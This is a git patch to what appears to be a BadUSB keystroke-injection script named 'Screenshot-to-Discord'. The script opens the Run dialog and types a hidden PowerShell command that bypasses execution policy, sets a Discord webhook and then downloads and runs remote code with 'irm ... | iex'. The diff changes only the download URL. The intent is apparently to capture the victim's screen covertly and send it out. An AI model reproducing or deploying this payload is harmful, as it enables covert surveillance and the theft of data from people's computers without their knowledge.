From e53ebc1db86da5225797fd46665377c2126aecf1 Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Tue, 17 Jun 2025 11:14:11 +0000 Subject: [PATCH] Update Screenshot-to-Discord.txt --- Screen-to-Discord/Screenshot-to-Discord.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Screen-to-Discord/Screenshot-to-Discord.txt b/Screen-to-Discord/Screenshot-to-Discord.txt index bd9ef50..b56fd2b 100644 --- a/Screen-to-Discord/Screenshot-to-Discord.txt +++ b/Screen-to-Discord/Screenshot-to-Discord.txt @@ -14,7 +14,7 @@ REM open powershell (remove "-W H" to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_sc_to_dc | iex +STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://bw0.cc/dcss | iex ENTER